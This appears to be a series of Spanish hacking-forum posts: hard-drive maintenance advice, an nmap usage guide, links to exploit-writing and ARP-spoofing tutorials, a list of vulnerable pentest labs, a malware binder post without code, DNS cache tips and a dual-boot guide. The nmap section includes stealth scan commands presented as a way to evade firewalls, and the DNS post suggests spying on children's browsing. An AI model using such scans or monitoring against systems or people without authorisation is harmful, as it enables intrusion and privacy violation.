Lo primero que tenemos que tener en cuenta es que se trata de un elemento de alta precisión, con unos discos internos que giran normalmente a 7.200 rpm y con unas cabezas lectoras que se desplazan a una gran velocidad a una distancia de los discos que se calcula en micras (una mota de polvo no cabe entre la cabeza y en disco), pero que en ningún momento pueden tocar este, ya que entonces ocurriría lo que se conoce como un aterrizaje de cabezales, con el consiguiente daño tanto para el disco como para el cabezal.
Con todo esto, la primera conclusión que se saca es que no es nada recomendable hacer movimientos bruscos del equipo si este está encendido, ya que hay que tener en cuenta que si bien las cabezas cuando no están leyendo o escribiendo se encuentran en una posición de reposo (en los discos muy antiguos había que aparcar los cabezales), un golpe o movimiento brusco pueden desplazar los cabezales, produciéndose el aterrizaje ya mencionado.
Con los discos externos debemos tener especial cuidado, ya que, aunque esté apagado, un golpe fuerte puede dañar el disco de forma irreparable.

También debemos asegurarnos de que tenga las menores vibraciones posibles, ya que un exceso de vibraciones en el disco duro puede llegar a dañarlo.

Otro factor muy importante es la temperatura de funcionamiento del disco. Un disco duro suele tener una temperatura de trabajo de entre 45º y 50º, con un tope operativo de sobre 60º. Unas temperaturas superiores a estas pueden causar un mal funcionamiento y, a la larga, provocar una avería. Es muy conveniente, sobre todo si nuestros programas o hábitos de uso del ordenador implican unos accesos al disco constantes y grandes, que le pongamos algún medio de refrigeración extra. Hay en el mercado disipadores diseñados especialmente para los discos duros que no son caros y van muy bien.
También es conveniente limpiarlo a menudo. Recordad que el polvo hace de aislante e impide una buena refrigeración.

Fundamental es que los voltajes que recibe sean los correctos (recibe tanto 12v como 5v), por lo que una buena fuente de alimentación y un estabilizador son dos cosas muy importantes para la salud de nuestro disco duro, aunque esto es común para todo el ordenador.

Y ahora vamos a ver algunas ''cosillas'' y comentarios que circulan por esos mundos y vamos a ver su fundamento y verdad.

- Formatear el disco duro acorta su vida y lo puede dañar:
No hay ninguna base en esta afirmación. Cuando se formatea un disco duro lo único que estamos haciendo son operaciones de escritura, y además el desplazamiento de los cabezales en este tipo de operaciones es bastante más lineal y constante que en una operación normal de lectura/escritura, por lo que el desgaste del disco es incluso inferior a cuando estamos trabajando con él.
Otra cosa es cuando se trata de un formateo a bajo nivel o de la utilización de programas de recuperación de discos. Estos procesos sí que suponen una altísima carga de trabajo para el disco duro y pueden acortar su vida útil, pero en ningún caso de forma significativa. Además, cuando recurrimos a estos sistemas es porque tenemos serios problemas en el disco, y en la mayoría de los casos las opciones son o emplear estos sistemas o tirar el disco, lo que sí que acorta drásticamente su vida útil.

- Montar un disco en RAID alarga su vida:
Esta teoría sólo sería válida para un RAID 0 en varios discos, pero ojo, por montar dos discos no quiere decir que la vida útil se duplique, simplemente que van a tener menos carga de trabajo al repartirse las operaciones de lectura/escritura, pero esto, como ya hemos visto, sólo es una parte de la ecuación. En otros tipos de RAID no hay ninguna diferencia.
El desgaste es mínimo en operaciones de lectura/escritura, y además los discos siempre están girando.

- Hacer varias particiones es bueno/malo para el disco duro:
Pongo bueno/malo porque se han dicho ambas cosas, y ambas son falsas. Para el disco duro no supone ninguna diferencia el estar dividido en una, dos o más particiones.

- Tal sistema operativo acorta la vida del disco duro:
Ultimamente han circulado rumores de que Ubutu acorta el ciclo de vida útil de los discos duros, sobre todo en portátiles. Esto es algo totalmente falso. La vida útil de un disco no depende del sistema operativo que tengamos instalado, sino de otros factores.

- Es mejor apagar el ordenador y volver a encenderlo que reiniciar (reset):
Pues para la vida del disco no. Mientras que apagar y encender supone parar el disco duro y volver a encenderlo, reiniciar no supone una paradadel disco, por lo que el desgaste es menor.
Por cierto, que lo que si que es bastante perjudicial es apagar y encender el equipo sin dejar un cierto tiempo para que se detenga totalmente el giro del disco duro.
En todo caso, siempre es mucho más perjudicial apagar o resetear desde el ordenador (con los botones de apagado o de reset) que hacerlo desde el sistema operativo.

- Es bueno apagar el ordenador cuando no lo utilicemos:

Pues si lo miramos bajo el punto de vista de un ahorro de energía, sí, pero si lo miramos bajo el punto de vista de mantenimiento del disco duro, no. Un disco duro es precisamente en los procesos de apagado/encendido cuando más sufre y más desgaste tiene, no por que tenga que trabajar más leyendo datos para el arranque, sino por el simple hecho de arrancar.
En general podemos decir que se debe apagar el ordenador cuando el tiempo de inactividad de este vaya a ser superior a las tres o cuatro horas. Si el tiempo de inactividad va a ser menor son preferibles otros métodos, como suspensión, hibernación o inactividad, que producen un arranque del disco menos brusco que un apagado y posterior encendido del sistema. Lo que si que es bueno en general es apagar totalmente el equipo, desconectándolo de la corriente.

La vida media de un disco se mide en ciclos de inicio/parada, y un disco normal suele tener una vida superior a los 50.000 ciclos (este es el mínimo que garantizan la mayoría de fabricantes), lo que hace que su vida útil sea bastante larga.

Evidentemente hay otros factores que influyen en la vida útil de un disco duro, pero en condiciones normales de uso con un trabajo bastante intensivo esta vida útil está por encima (teóricamente) de los 30 años, siendo este ciclo superado en discos de gama alta y discos especiales para servidores.

En mi caso, tengo un Olivetti 80286 con casi 20 años y el disco duro es el original y funciona a la perfección (y eso que ni las calidades de los materiales ni la tecnología de fabricación eran las mismas en aquella época).

Que un disco sólo nos dure un par de años tan sólo es síntoma de una baja calidad de este o, en la gran mayoría de las ocasiones, de un mal uso del mismo, del que sólo nosotros somos responsables. Decir que un disco duro ha durado tres o cuatro años no es precisamente una buena marca. Hay que tener en cuenta que muchos fabricantes de discos duros ofrecen una garantía de tres años, y si hacen esto es porque no esperan ningún problema en ese periodo de tiempo.

Y ya que en ello estamos, por todo lo expuesto anteriormente, es fácil comprender que la vida útil de un disco duro en un portátil sea inferior a la de un disco duro en un ordenador de sobremesa, a pesar de un especial diseño en cuanto a resistencia y tolerancia a golpes y vibraciones superior en el caso de discos para portátiles, así como unas inercias de giro bastante menores. También influye bastante en este tipo de ordenadores los gestores de energía (sobre todo cuando funcionan a batería), que obligan al disco duro a un número excesivamente alto de paradas, y por lo tanto, de ciclos de inicio/parada.

Y ahora vamos a ver un poco el mantenimiento del software, que sí que influye en su desgaste y vida útil, así como en su rendimiento.

Mantenimiento del disco duro (software):


Como ya hemos visto en la parte de este tutorial relativa al hardware, micho se ha dicho de disco en RAID, de apagar el ordenador, de particiones... pero muchas veces nos olvidamos de cómo ahorrarle trabajo a nuestro disco, y esto se hace manteniendo nuestro software en condiciones.

Una bueno forma es hacer un buen mantenimiento de éste de forma periódica, procurando que la información de se encuentre lo menos fragmentada que sea posible. Con ellos no es que las cabezas vayan a efectuar menos operaciones de lectura/escritura (que van a hacer las mismas), sino que los desplazamientos de las cabezas van a ser menos bruscos y menos amplios. Esto va a afectar sobre todo al rendimiento del disco duro y de paso también en su conservación, ya que movimientos menos bruscos y amplios significa también generar menos temperatura.

Por último, vamos a ver cuales son los grandes enemigos de nuestro disco duro:

- Golpes y movimientos bruscos.

Esto es muy malo con los discos en movimiento, pero también lo es con los discos parados, incluso desconectados.

- Una mala alimentación.
Una mala alimentación y cortes o sobrecargas eléctricas pueden incluso dejar nuestro disco totalmente inutilizado.

- Una mala refrigeración.
Un trabajo constante por encima de su temperatura media de funcionamiento termina por bajar su rendimiento y por estropear físicamente el disco duro.

- Una fuente magnética muy intensa.
Una fuente magnética muy intensa no sólo nos puede borrar los datos, sino que puede dañar de forma irrecuperable los discos internos de nuestro disco duro. Evidentemente un disco duro está bastante bien protegido, pero cuando lo tengamos desinstalado debemos tener mucho cuidado y mirar muy bien donde lo colocamos.

En fin, espero que este tutorial os sirva para disfrutar durante un tiempo bastante largo de vuestro disco duro, en la seguridad de que en condiciones normales lo vais a jubilar antes por viejo, lento y poca capacidad que por haber fallado por desgaste de uso.

Autor: Josito
#172
Hacking / Creando un Exploit paso a paso
Marzo 30, 2012, 07:40:37 AM
¿Cómo encontrar vulnerabilidades, escribir código shell,  aprovechar la vulnerabilidad encontrada y finalmente, convertirlo en un módulo de Metasploit?, son algunas de las interrogantes que alguna vez nos hemos realizado y David Hoelzer , Senior Fellow en el Instituto SANS  nos las resuelve con esta serie de vídeo tutoriales.

En los siguientes videoturiales, aprenderemos de la mano de David Hoelzer, como crear un Exploit paso a paso y convertirlo en un modulo de Metasploit para después utilizarlo con este excelente framework; aunque los vídeos se encuentran en ingles, son bastante prácticos y visuales, con lo que no tendremos ningún problema al seguirlos.

Videos:

Exploits - Part 1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Exploits - Part 2 - 1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Exploits - Part 2 - 2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Exploits - Part 3 - 1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Exploits - Part 3 - 2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Exploits - Part 4 - 1
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Exploits - Part 4 - 2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#173
Hacking / Nmap [Usos Básicos]
Marzo 30, 2012, 07:39:47 AM
Hola, que tal...
En este pequeño "manual" tratare de explicar el uso básico de esta herramienrta: nmap

¿Que es nmap?
Básicamente nmap es una herramienta con la que podemos escanear redes grandes o pequeñas y poder determinar los equipos activos y los servicios de los mismos.

Conceptos básicos:
¿Que es un puerto?:
Un puerto es una zona en la que dos ordenadores (hosts) intercambian información
¿Que es un servicio?:
Un servicio es el tipo de información que se intercambia con una utilidad determinada como ssh o telnet.
¿Que es un Firewall?:
Un firewall acepta o no el trafico entrante o saliente de un ordenador.
¿Que son paquetes SYN?:
Así por encima, pueden ser paquetes que abren un intento de establecer una conexión TCP.

Como instalar nmap[?]
Es tan sencillo como ir en una terminal y teclear:

Código: text
sudo apt-get install nmap


Esto para sistemas Operativos Debian y derivados del mismo [Ubuntu, Linux Mint, etc..]
En S.O como Windows puedes ir a la pagina de Nmap y vas a la seccion de descargas, lo bajas y lo instalas.


Escaneo basico:

Código: text
$ nmap [Tipos(s)de escaneo] [Opciones] <servidor o red>


Pues bien, llegó la hora de hacer nuestro primer uso de esta tool, primero vamos a una terminal o al simbolo del sistema, nos logeamos como root [o admin] segun su S.O y tecleamos:

Código: text
nmap localhost


En concreto empezara a trabajar nmap...
Bien con nmap estamos llamando al programa, localhost es el equipo que deseamos escanear...


Para escanear un rango determinado de puertos para una ip lo haremos de la siguiente manera. Opción -p

Código: text
nmap -p 1-80 localhost



Como podemos ver, en mi caso no me detecto ningun puerto abierto...
Tambien podemos pedir que nmap nos haga un escaneo de diferentes puertos, por ejemplo:

Código: text
nmap -p 1,22,23,30 localhost




Y como podemos ver, me muestra que el puerto 1 esta cerrado, al igual que el puerto, 22,23, y el 30 esta abierto [ya que abri el puerto con netcat]
Bien, ahora estamos en una red de la cual queremos saber que computadoras tienen, por ejemplo el puerto 445 abierto,lo podemos hacer asi:

Código: text
nmap -p 445 192.168.1.2-254


Podemos usar la opción -P0, puede servirnos si lo que queremos es que no intente hacer ping a un servidor antes de escanearlo, es muy útil para maquinas que tienen firewall o no responden a ping.
Código: text
nmap -P0 192.168.1.65


Tambien, podemos hacer un escaneo a una maquina haciendo Ping, con la opcion -sP
Código: text
nmap -sP 192.168.1.65


Podemos tambien escanear algun puerto y ver la version del servicio que corre, para esto usamos la opcion -sV, por ejemplo, queremos ver que version de ftp corre alguna maquina:
Código: text
nmap -sV -p 21 192.168.1.65



Otra opcion interesante es la flag -O , que nos permite saber que S.O esta corriendo el host que estamos escaneando, su uso es algo como:
Código: text
nmap -O 192.168.1.65




También podemos hacer un escaneo ya sea a una alta velocidad o una baja velocidad para no ser detectados, esto lo podemos hacer mediante la opcion -T seguidamente de un numero dentro del rango 0-5.
Las opciones anteriores van de la menor velocidad (0) a la mayor velocidad (5) de escaneo. Por ejemplo podemos hacer:
Código: text
nmap -T 5 192.168.1.65



OTRAS OPCIONES:

[-sS] Escaneo TCP SYN se envían paquetes SYN, denominada como escaneo medio abierto porque envía paquetes como si se fuese a abrir una conexión.
Debemos ser root para poder usar esta opción.

[Opciones -sF -sX -sN] Modos Stealth FIN, Xmas Tree o Nul scan respectivamente. Con estos modos seremos muy pero muy clandestinos, asi que si nos encontramos con un filtro o algun firewall que no nos dejen enviar paquetes SYN a determinado(s) puerto(s) podemos usar alguna de estas opciones.
Debemos ser root para poder usar estas opciones.

[-v] El Famoso verbose: Nos muestra informacion mas amplia de nustro escaneo
[-h] Muestra la ayuda de nmap

By [Z]tuX
Source: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#174
Hacking / Tutorial Ettercap + etterfilter by k43l
Marzo 30, 2012, 07:38:30 AM

Bueno, ayer me puse hacer un tutorial de un filtro conocido en Ettercap, se trata de "Etterfilter" y de como podemos reemplazar las imagenes de las Paginas Web visitadas por la imagen que nosotros quermos realizando la conocida tecnica de Arp Spoofing, espero que sea de su agrado y cualquier consulta o critica constructiva es bienvenida.
salu2

link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#175
Hacking / Mapa conceptual del hacking
Marzo 30, 2012, 07:37:11 AM
Este mapa lo encontre muy bueno hasta ise una disertancion en la universidad xDDDDD.

en el mapa podras ver:

La tentaciones
Los eventos de hacking
El hacktivismo
Hacking Tecnicos
Valores del Hacking
Ciber Peligro




El Link de la hipermapa conceptual
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos!
#176
Hacking / Recursos y aplicaciones de PENTEST
Marzo 30, 2012, 07:36:35 AM
Aquí una lista de algunos recursos con aplicaciones vulnerables diseñadas especialmente para pruebas de pentest en un entorno seguro y legal. Son un conjunto de LiveCDs inseguros y máquinas virtuales diseñados para ser utilizados como objetivos para la enumeración, la explotación web, descifrado de contraseñas y la ingeniería inversa y elevación de privilegios.

Estos recursos no deben ser utilizados bajo entornos de producción ya que están diseñados para ser explotados y son totalmente inseguros. Se deben utilizar de forma virtualizada.

HOLYNIX

Similar a De-ice y pWnOS, es una imagen vmware server ubuntu que fue construida para que los agujeros de seguridad sean aprovechados a efectos de pruebas de penetración.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De-ICE LiveCDs


Son la creación de Thomas Wilhelm, quien fue transferido a un equipo de pruebas de penetración en la empresa para la que trabajaba. Por la necesidad de aprender tanto sobre las pruebas de penetración lo más rápidamente posible, Thomas comenzó a buscar los instrumentos y metas. Él encontró una serie de herramientas, pero no utilizables para la práctica. Finalmente, en un intento por reducir la brecha de aprendizaje, Thomas creó escenarios PenTest usando LiveCDs.
Los escenarios que están disponibles en De-Ice son:

De-Ice escenario 1:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De-Ice escenario 2:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De-Ice escenario 3:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

pWnOS

Es una imagen virtual con diferentes puntos de entrada donde el objetivo final es conseguir root

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Metasploitable

Metasploitable es un servidor con Ubuntu 8.04 en una  imagen VMWare. Incluye una serie de paquetes vulnerables, entre estas una instalación de Tomcat 5.5 (con credenciales débil), tikiwiki distcc, twiki, y mysql.

Descarga metasploitable:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Web Security Dojo

Libre y de código abierto para la seguridad en aplicaciones web contiene Tools + objetivos
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Damn Vulnerable Web app DVWA 1.07

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

MOTH

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

KIOPTRIX

Kioptrix es otro "OS diseñado para ser vulnerable" (como De-ICE, Metasploitable y pWnOS), con el objetivo de pasar de "boot" a "root" por cualquier medio posible

[color=red=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Kioptrix Level 1[/color]
[color=red=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Kioptrix Level 2 [/color]

OWASPBWA

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

BADSTORE

Badstore.net se dedica a ayudar a entender cómo los piratas informáticos se aprovechan de vulnerabilidades de aplicaciones Web, y le muestra cómo reducir la exposición.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

WackoPicko

WackoPicko es un sitio web que contiene vulnerabilidades conocidas. 
Un análisis de black-box Web Vulnerability Scanners se encuentra en :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lampsecurity

LAMPSecurity está diseñado para ser una serie de imágenes de máquinas virtuales vulnerable junto con la documentación complementaria diseñado para enseñar sobre seguridad en GNU/Linux, Apache, php, y mysql.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


bueno eso es todo espero que les guste mucho

saludos
#177
Back-end / Taller de PHP: Temario
Marzo 30, 2012, 07:30:32 AM


¡Bienvenidos al taller de PHP! En este curso aprenderás a generar páginas dinámicas del lado del servidor. También a integrarlas con MySql, por ejemplo. El objetivo principal es que aprendas los conceptos básicos para poder desarrollar sitios y aplicaciones web dinámicas. Al final del taller podrás crear tu propio blog (código de programación).


#178
Seguridad Wireless / Contraseñas por Defecto en Routers
Septiembre 02, 2011, 02:25:54 PM


Encontré una bonita página donde puedes escoger el modelo del router el cual quieres obtener la password que trae por defecto y te muestra una lista con los diferentes modelos y las posibles contraseñas.



Enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#179
Binder (Builder + Stub) en Visual Basic 2008



Builder:



Stub:



Fuente: MundoHacking
Autor: Ibob
#180
Windows / Limpiar la caché de la DNS
Agosto 29, 2011, 06:08:30 PM
    En principio todos pensamos que si se borra el Historial del navegador o se hace uso del modo de navegación privada, nadie puede conocer los sitios que hemos visitado ... pero eso no es del todo cierto.     

    Existe un componente de nuestro
SO (Sistema Operativo) que se escapa a las funcionalidades de privacidad de los navegadores más habituales (Firefox, Chrome e Internet Explorer), se trata de la caché del DNS, un registro donde se deja constancia de las direcciones IP, dominios e información variada de los lugares que se han visitado para agilizar el acceso las próximas veces.


Para consultar estos datos, vamos a Inicio/Ejecutar y allí escribe cmd en la zona Abrir. Pulsamos Aceptar, aparecerá la ventana de Símbolo del sistema, aquí escribe ipconfig/displaydns y pulsamos Enter. Con ello, veremos la caché DNS de los últimos sitios visitados.



Esto nos puede servir por ejemplo para espiar la actividad en internet de nuestros hijos aunque borrren el historial de navegación, por otra parte también puede comprometer nuestra privacidad sobre todo si compartimos nuestro PC con otros familiares o amigos, por lo que puede que nos interese saber cómo borrar/renovar la Caché del DNS.


Para renovar la cache DNS en sistemas Microsoft Windows

(Windows XP, 2003, 2000):- Menú Inicio -&gt; Comando Ejecutar -&gt; tipiar el comando "cmd"


- En el símbolo del sistema escribimos ipconfig/flushdns

- Listo, ahora su sistema tiene la cache DNS renovada.
(Windows 7, Vista):
- Pulsamos en inicio y escribimos en la caja de busqueda cmd (no pulses Enter).



- En los resultados de búsqueda que se presentan, botón derecho y clic en "cmd" y en ejecutar como administrador


- En el símbolo del sistema, escribe ipconfig/flushdns y ahora sí pulsa Enter.



- Si todo es correcto veremos algo como lo que se muestra a continuación:

Para realizar este procedimiento en sistemas Linux, se debe reiniciar el  nscd daemon:
1.Abra la ventana de terminal (La localización puede variar según la distribución).
2.Renueve sus DNS cache reiniciando el daemon con 'nscd' y restaurandolo con el siguiente comando: /etc/rc.d/init.d/nscd restart


1.O si dese hacerlo de forma manual detenga y inice el "daemon" con los siguientes comandos:[list=1]
  • /etc/rc.d/init.d/nscd stop
  • /etc/rc.d/init.d/nscd start
2.Digite "logout" y presione la tecla 'Enter' para cerrar la ventana...
Para renovar la cache DNS en sistemas Mac OS:


10.4 (Tiger)1.Abra su ventana de terminal (Localizada en /Applications/Utilities).
2.Renueve sus DNS cache con las siguientes lineas de comando: lookupd -flushcache
3.Digite "logout" y presione la tecla 'Enter' para cerrar la ventana.
10.5 (Leopard)1.Abra su ventana de terminal (Localizada en /Applications/Utilities).

2.Renueve sus DNS cache con las siguientes lineas de comando:: dscacheutil -flushcache
3.Digite "logout" y presione la tecla 'Enter' para cerrar la ventana.

Bien, hasta aquí hemos visto como visualizar la caché DNS y hemos aprendido a limpiarla, pero ...

¿Qué es la caché DNS?
Cuando escribimos una dirección web en el explorador web y presionamos Enter, estamos enviando una consulta a un servidor DNS. Si la consulta es correcta, el sitio web se abrirá; de lo contrario, recibirá un mensaje de error.


El registro de estas consultas correctas e incorrectas se guarda en una ubicación de almacenamiento temporal del equipo denominada caché DNS. DNS comprueba siempre la caché antes de hacer una consulta a un servidor DNS y si encuentra que un registro coincide con la consulta, DNS usa ese registro en lugar de enviar la consulta al servidor. Esto permite que las consultas sean más rápidas y reduce el tráfico de la red e Internet.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta¿Porqué limpiar la caché de la DNS?

Además de lo que ya vimos al principio (Proteger nuestra privacidad) y segun nos cuenta Microsoft en el párrafo de arriba: Cuando visitamos una página web, Windows intenta acelerar la apertura de la misma colocando la información de la DNS de esa web en la caché de la DNS en nuestros PCs.


Esto es normal, hasta que se producen problemas con la Red, el servidor DNS o incluso con la página web en cuestión.

La caché de la DNS almacena en nuestros PCs entradas positivas y negativas.
Las positivas son aquellas en las que la "DNS Lookup" tuvo éxito y pudimos conectar con la web que deseábamos visualizar.


Las entradas negativas son aquellas que quedan registradas como consecuencia de algún intento fallido de la "DNS Lookup" que nos impidió acceder a la página web.
El problema surge cuando la caché de la DNS guarda esas entradas negativas y, aunque la web ya se encuentre disponible y se pueda acceder sin problemas, Windows nos seguirá indicando "DNS ERROR!".

Es por ello que para solucionar este problema y evitar que esas entradas negativas se acumulen en la caché de la DNS del PC, deberemos hacer limpieza de vez en cuando, como ya expliqué más arriba.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Qué es el DNS

Domain Name System o DNS (en español: sistema de nombres de dominio) es un sistema de nomenclatura jerárquica para computadoras, servicios o cualquier recurso conectado a Internet o a una red privada. Este sistema asocia información variada con nombres de dominios asignado a cada uno de los participantes. Su función más importante, es traducir (resolver) nombres inteligibles para los humanos en identificadores binarios asociados con los equipos conectados a la red, esto con el propósito de poder localizar y direccionar estos equipos mundialmente.

El DNS es una base de datos distribuida y jerárquica que almacena información asociada a nombres de dominio en redes como Internet. Aunque como base de datos el DNS es capaz de asociar diferentes tipos de información a cada nombre, los usos más comunes son la asignación de nombres de dominio a direcciones IP y la localización de los servidores de correo electrónico de cada dominio.


La asignación de nombres a direcciones IP es ciertamente la función más conocida de los protocolos DNS. Por ejemplo, si la dirección IP del sitio FTP de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es 200.64.128.4, la mayoría de la gente llega a este equipo especificando No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y no la dirección IP. Además de ser más fácil de recordar, el nombre es más fiable. La dirección numérica podría cambiar por muchas razones, sin que tenga que cambiar el nombre.

Inicialmente, el DNS nació de la necesidad de recordar fácilmente los nombres de todos los servidores conectados a Internet. En un inicio, SRI (ahora SRI International) alojaba un archivo llamado HOSTS que contenía todos los nombres de dominio conocidos (técnicamente, este archivo existe - la mayoría de los sistemas operativos actuales pueden ser configurados para revisar su archivo hosts). El crecimiento explosivo de la red causó que el sistema de nombres centralizado en el archivo hosts no resultara práctico y en 1983, Paul Mockapetris publicó los RFCs 882 y 883 definiendo lo que hoy en día ha evolucionado hacia el DNS moderno. (Estos RFCs han quedado obsoletos por la publicación en 1987 de los RFCs 1034 y 1035).


Más info: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#181

Con la llegada de la nueva versión de Linux Ubuntu llegan nuevos manuales de instalación para la colección en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.Info. Anteriormente vimos artículos como ... No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y después fue ... No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.



Para esta nueva versión 8.10 de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no podía faltar un manual de instalación detallado para aquellos que se quieran iniciar en este sistema operativo que está dando tanto de que hablar. La mayoría de personas que les pica la curiosidad de probar otro sistema que no sea Windows tiene miedo al no saber, al no adaptarse, y básicamente a no defenderse en condiciones con Linux. Esto es lo que me dicen todas las personas que me preguntan sobre que tal es Linux. Por ello y para ellos voy a explicar como se instalan estos dos sistemas en el mismo ordenador desde cero.



Personalmente no soy partidario de explicar nada sobre Windows pero seguro que mas de uno se anima a probarlo acompañado de Windows y adaptarse poco a poco a Linux. A todos los que me habéis pedido este manual ... Va por vosotros


Yo voy a usar mi ordenador portátil que tiene un disco duro de 80 Gb y así aprovecho, lo limpio un poco que hace mucho tiempo que no lo formateo. Te invito a que hagas tu lo mismo con tu portátil o equipo de sobremesa !
¿ Que necesitamos ?



CD de instalación de Windows XP + Drivers *Esto tienes que tenerlo tu, yo no puedo decirte de donde sacarlo.

CD de instalación de Linux Ubuntu *Puedes descargarte No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y quemar la imagen en un CD, completamente gratis claro !!


Una vez tengamos esos dos CDs aseguraos de que tenéis todos datos que necesitáis de vuestro ordenador bien a salvo en un disco duro extraíble o DVDs ya que en el siguiente manual que veremos a continuación vamos a eliminar todas las particiones existentes, así tendremos el ordenador completamente nuevo una vez finalice con la instalación de ambos.


El primer sistema operativo que vamos a instalar de los dos va a ser Windows XP ya que después instalaremos Linux Ubuntu que es quien nos va a instalar el menú Grub que será quien nos pregunte el sistema operativo que deseamos arrancar en nuestro PC finalmente.



Para comenzar insertamos el CD de Window XP en la unidad y arrancamos el ordenador, en unos minutos veremos la siguiente pantalla  ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



A continuación presionamos la tecla Enter ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Aceptamos la licencia pulsando la tecla F8 ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Seguidamente pulsamos la tecla escape ESC ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Como podéis ver tenemos a la vista todas las particiones de nuestro disco duro. Como os decía al principio de este articulo, vamos a borrarlo todo y ponerlo todo nuevo. Para borrar todas las particiones debemos eliminarlas una a una en caso que tengamos varias situándonos en la partición que queramos borrar y pulsando la tecla D ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Pulsamos la tecla Enter ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


pulsamos la tecla L ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Y así tantas veces como necesitemos hasta tener nuestro disco duro totalmente limpio de particiones ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Una vez tengamos limpio nuestro disco duro vamos a crear la partición donde instalaremos Windows XP con la tecla C ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


En la siguiente casilla vemos la totalidad de nuestro disco duro especificada en MegaBytes. He aquí donde tenemos que decirle cuanto espacio de disco duro necesitamos para Windows XP. En mi caso voy a darle 20 Gb que será lo mismo que 20000 MegaBytes ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Una vez introducido el numero en MegaBytes pulsamos la tecla Enter ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Como veis ya tenemos una partición preparada para instalar Windows XP. Nos situamos sobre ella y pulsamos la tecla Enter ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


En este apartado vamos a indicarle el sistema de ficheros, FAT o NTFS, ninguno de los dos me gusta pero si tengo que elegir me quedo con NTFS. Pulsamos la tecla Enter y comenzará el formateo ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


El solo formateará e instalará el sistema. Los siguientes pasos hasta completar la instalación de Windows XP son muy sencillos, tan solo tenéis que leer y siguiente, siguiente, siguiente y mas siguiente hasta llegar a esta pantalla ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Pulsamos sobre el botón Inicio -&gt; Apagar ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Extraemos el CD de instalación de Windows XP e insertamos el CD de instalación de Linux Ubuntu y pulsamos sobre el botón Reiniciar ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


El sistema reiniciará y cargará la pantalla inicial del instalador de Linux Ubuntu ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Seleccionamos el idioma deseado y pulsamos la tecla Enter ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


A continuación seleccionamos la opción Instalar Ubuntu ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Instalando ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Seleccionamos el idioma deseado y pulsamos sobre el botón Adelante ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Seleccionamos nuestro país y pulsamos sobre el botón Adelante ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Seleccionamos el idioma de nuestro teclado y continuamos con Adelante ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Hemos llegado al apartado de el particionado de discos, al igual que hicimos cuando instalamos Windows XP ahora vamos crear las particiones donde irá instalado nuestro nuevo y flamante Linux Ubuntu de ultima generación.


